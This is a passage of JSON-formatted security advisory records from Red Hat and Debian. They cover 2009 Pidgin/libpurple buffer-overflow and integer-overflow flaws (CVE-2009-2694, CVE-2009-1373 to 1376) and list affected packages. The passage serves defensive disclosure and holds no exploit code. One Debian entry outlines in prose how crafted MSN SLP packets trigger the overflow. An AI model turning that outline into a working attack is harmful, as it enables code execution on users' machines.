networks simultaneously.\n\nFederico Muttis of Core Security Technologies discovered a flaw in Pidgin's\nMSN protocol handler. If a user received a malicious MSN message, it was\npossible to execute arbitrary code with the permissions of the user running\nPidgin. (CVE-2009-2694)\n\nNote: Users can change their privacy settings to only allow messages from\nusers on their buddy list to limit the impact of this flaw.\n\nThese packages upgrade Pidgin to version 2.5.9. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which resolve\nthis issue. Pidgin must be restarted for this update to take effect.", "reporter": "RedHat", "published": "2009-08-18T04:00:00", "type": "redhat", "title": "(RHSA-2009:1218) Critical: pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-26T04:26:17", "id": "RHSA-2009:1218", "href": "https://access.redhat.com/errata/RHSA-2009:1218", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-27T21:42:39", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "3", "packageVersion": "1.5.1-3.el3", "arch": "ppc", "packageName": "pidgin", "packageFilename": "pidgin-1.5.1-3.el3.ppc.rpm", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to this update package, which contains\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "reporter": "RedHat", "published": "2009-05-22T04:00:00", "type": "redhat", "title": "(RHSA-2009:1059) Important: pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1373", "CVE-2009-1376"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-05-26T04:26:17", "id": "RHSA-2009:1059", "href": "https://access.redhat.com/errata/RHSA-2009:1059", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-09T07:20:07", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-perl-2.5.5-2.el4.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-2.5.5-2.el4.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-tcl-2.5.5-2.el4.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "finch-devel-2.5.5-2.el4.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "finch-2.5.5-2.el4.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "pidgin-2.5.5-2.el4.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "libpurple-devel-2.5.5-2.el4.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "pidgin-perl-2.5.5-2.el4.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "i386", "packageFilename": "pidgin-devel-2.5.5-2.el4.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "src", "packageFilename": "pidgin-2.5.5-2.el4.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "pidgin-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "pidgin-devel-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-devel-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "pidgin-perl-2.5.5-2.el4.ia64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-perl-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "finch-2.5.5-2.el4.ia64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-tcl-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "finch-devel-2.5.5-2.el4.ia64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ia64", "packageFilename": "libpurple-2.5.5-2.el4.ia64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "pidgin-2.5.5-2.el4.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-devel-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "finch-devel-2.5.5-2.el4.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-perl-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "libpurple-2.5.5-2.el4.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "finch-2.5.5-2.el4.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "pidgin-perl-2.5.5-2.el4.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "x86_64", "packageFilename": "pidgin-devel-2.5.5-2.el4.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "libpurple-perl-2.5.5-2.el4.ppc.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "finch-2.5.5-2.el4.ppc.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "libpurple-2.5.5-2.el4.ppc.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "libpurple-tcl-2.5.5-2.el4.ppc.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "libpurple-devel-2.5.5-2.el4.ppc.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "pidgin-2.5.5-2.el4.ppc.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "pidgin-perl-2.5.5-2.el4.ppc.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "pidgin-devel-2.5.5-2.el4.ppc.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.5.5-2.el4", "arch": "ppc", "packageFilename": "finch-devel-2.5.5-2.el4.ppc.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "finch-2.5.5-3.el5.i386.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "pidgin-2.5.5-3.el5.i386.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "libpurple-perl-2.5.5-3.el5.i386.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "libpurple-2.5.5-3.el5.i386.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "libpurple-tcl-2.5.5-3.el5.i386.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "pidgin-perl-2.5.5-3.el5.i386.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "src", "packageFilename": "pidgin-2.5.5-3.el5.src.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "libpurple-tcl-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple-tcl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "libpurple-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "finch-2.5.5-3.el5.x86_64.rpm", "packageName": "finch", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "pidgin-perl-2.5.5-3.el5.x86_64.rpm", "packageName": "pidgin-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "libpurple-perl-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple-perl", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "pidgin-2.5.5-3.el5.x86_64.rpm", "packageName": "pidgin", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "finch-devel-2.5.5-3.el5.x86_64.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "finch-devel-2.5.5-3.el5.i386.rpm", "packageName": "finch-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "pidgin-devel-2.5.5-3.el5.i386.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "i386", "packageFilename": "libpurple-devel-2.5.5-3.el5.i386.rpm", "packageName": "libpurple-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "pidgin-devel-2.5.5-3.el5.x86_64.rpm", "packageName": "pidgin-devel", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "5", "packageVersion": "2.5.5-3.el5", "arch": "x86_64", "packageFilename": "libpurple-devel-2.5.5-3.el5.x86_64.rpm", "packageName": "libpurple-devel", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA buffer overflow flaw was found in the way Pidgin initiates file transfers\nwhen using the Extensible Messaging and Presence Protocol (XMPP). If a\nPidgin client initiates a file transfer, and the remote target sends a\nmalformed response, it could cause Pidgin to crash or, potentially, execute\narbitrary code with the permissions of the user running Pidgin. This flaw\nonly affects accounts using XMPP, such as Jabber and Google Talk.\n(CVE-2009-1373)\n\nA denial of service flaw was found in Pidgin's QQ protocol decryption\nhandler. When the QQ protocol decrypts packet information, heap data can be\noverwritten, possibly causing Pidgin to crash. (CVE-2009-1374)\n\nA flaw was found in the way Pidgin's PurpleCircBuffer object is expanded.\nIf the buffer is full when more data arrives, the data stored in this\nbuffer becomes corrupted. This corrupted data could result in confusing or\nmisleading data being presented to the user, or possibly crash Pidgin.\n(CVE-2009-1375)\n\nIt was discovered that on 32-bit platforms, the Red Hat Security Advisory\nRHSA-2008:0584 provided an incomplete fix for the integer overflow flaw\naffecting Pidgin's MSN protocol handler. If a Pidgin client receives a\nspecially-crafted MSN message, it may be possible to execute arbitrary code\nwith the permissions of the user running Pidgin. (CVE-2009-1376)\n\nNote: By default, when using an MSN account, only users on your buddy list\ncan send you messages. This prevents arbitrary MSN users from exploiting\nthis flaw.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.", "reporter": "RedHat", "published": "2009-05-22T04:00:00", "type": "redhat", "title": "(RHSA-2009:1060) Important: pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-1373", "CVE-2009-1374", "CVE-2009-1375", "CVE-2009-1376"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:57:15", "id": "RHSA-2009:1060", "href": "https://access.redhat.com/errata/RHSA-2009:1060", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2016-09-02T18:37:43", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "all", "packageFilename": "libpurple-dev_2.4.3-4lenny3_all.deb", "packageName": "libpurple-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "x86-64", "packageFilename": "finch_2.4.3-4lenny3_amd64.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "arm", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_arm.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "all", "packageFilename": "pidgin-data_2.4.3-4lenny3_all.deb", "packageName": "pidgin-data", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "alpha", "packageFilename": "finch_2.4.3-4lenny3_alpha.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "arm", "packageFilename": "finch_2.4.3-4lenny3_arm.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "all", "packageFilename": "libpurple-bin_2.4.3-4lenny3_all.deb", "packageName": "libpurple-bin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "x86-64", "packageFilename": "libpurple0_2.4.3-4lenny3_amd64.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ppc", "packageFilename": "finch_2.4.3-4lenny3_powerpc.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "all", "packageFilename": "pidgin-dev_2.4.3-4lenny3_all.deb", "packageName": "pidgin-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "i686", "packageFilename": "libpurple0_2.4.3-4lenny3_i386.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "alpha", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_alpha.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "x86-64", "packageFilename": "pidgin_2.4.3-4lenny3_amd64.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "mips", "packageFilename": "pidgin_2.4.3-4lenny3_mips.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ppc", "packageFilename": "libpurple0_2.4.3-4lenny3_powerpc.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ia64", "packageFilename": "libpurple0_2.4.3-4lenny3_ia64.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "armel", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_armel.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "all", "packageFilename": "finch-dev_2.4.3-4lenny3_all.deb", "packageName": "finch-dev", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ia64", "packageFilename": "finch_2.4.3-4lenny3_ia64.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "armel", "packageFilename": "libpurple0_2.4.3-4lenny3_armel.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "i686", "packageFilename": "finch_2.4.3-4lenny3_i386.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "arm", "packageFilename": "pidgin_2.4.3-4lenny3_arm.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3.orig", "arch": "src", "packageFilename": "pidgin_2.4.3.orig.tar.gz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "mips", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_mips.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "arm", "packageFilename": "libpurple0_2.4.3-4lenny3_arm.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "mips", "packageFilename": "finch_2.4.3-4lenny3_mips.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "armel", "packageFilename": "pidgin_2.4.3-4lenny3_armel.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "hppa", "packageFilename": "finch_2.4.3-4lenny3_hppa.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "mips", "packageFilename": "libpurple0_2.4.3-4lenny3_mips.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ppc", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_powerpc.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "hppa", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_hppa.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "hppa", "packageFilename": "pidgin_2.4.3-4lenny3_hppa.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ia64", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_ia64.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ppc", "packageFilename": "pidgin_2.4.3-4lenny3_powerpc.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "x86-64", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_amd64.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "alpha", "packageFilename": "libpurple0_2.4.3-4lenny3_alpha.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "hppa", "packageFilename": "libpurple0_2.4.3-4lenny3_hppa.deb", "packageName": "libpurple0", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "i686", "packageFilename": "pidgin-dbg_2.4.3-4lenny3_i386.deb", "packageName": "pidgin-dbg", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "alpha", "packageFilename": "pidgin_2.4.3-4lenny3_alpha.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "armel", "packageFilename": "finch_2.4.3-4lenny3_armel.deb", "packageName": "finch", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "i686", "packageFilename": "pidgin_2.4.3-4lenny3_i386.deb", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "src", "packageFilename": "pidgin_2.4.3-4lenny3.dsc", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3.diff", "arch": "src", "packageFilename": "pidgin_2.4.3-4lenny3.diff.gz", "packageName": "pidgin", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny3", "arch": "ia64", "packageFilename": "pidgin_2.4.3-4lenny3_ia64.deb", "packageName": "pidgin", "operator": "lt"}], "description": "Federico Muttis discovered that libpurple, the shared library that adds support for various instant messaging networks to the pidgin IM client, is vulnerable to a heap-based buffer overflow. This issue exists because of an incomplete fix for [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) and [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>). An attacker can exploit this by sending two consecutive SLP packets to a victim via MSN.\n\nThe first packet is used to create an SLP message object with an offset of zero, the second packet then contains a crafted offset which hits the vulnerable code originally fixed in [CVE-2008-2927](<https://security-tracker.debian.org/tracker/CVE-2008-2927>) and [CVE-2009-1376](<https://security-tracker.debian.org/tracker/CVE-2009-1376>) and allows an attacker to execute arbitrary code.\n\nNote: Users with the \"Allow only the users below\" setting are not vulnerable to this attack. If you can't install the below updates you may want to set this via Tools->Privacy.\n\nFor the stable distribution (lenny), this problem has been fixed in version 2.4.3-4lenny3.\n\nFor the testing distribution (squeeze), this problem will be fixed soon.\n\nFor the unstable distribution (sid), this problem has been fixed in version 2.5.9-1.\n\nWe recommend that you upgrade your pidgin packages.", "edition": 1, "reporter": "Debian", "published": "2009-08-19T00:00:00", "title": "pidgin -- insufficient input validation", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2694"], "modified": "2009-08-19T00:00:00", "id": "DSA-1870", "href": "http://www.debian.org/security/dsa-1870", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-02T18:22:01", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch-dev_2.4.3-4lenny2_all.deb", "packageName": "finch-dev", "arch": "all", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_mipsel.deb", "packageName": "pidgin-dbg", "arch": "mipsel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_ia64.deb", "packageName": "pidgin-dbg", "arch": "ia64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_amd64.deb", "packageName": "pidgin-dbg", "arch": "x86-64", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_armel.deb", "packageName": "pidgin-dbg", "arch": "armel", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "pidgin-dbg_2.4.3-4lenny2_s390.deb", "packageName": "pidgin-dbg", "arch": "s390x", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "5", "packageVersion": "2.4.3-4lenny2", "packageFilename": "finch_2.4.3-4lenny2_ia64.deb", "packageName": "finch", "arch": 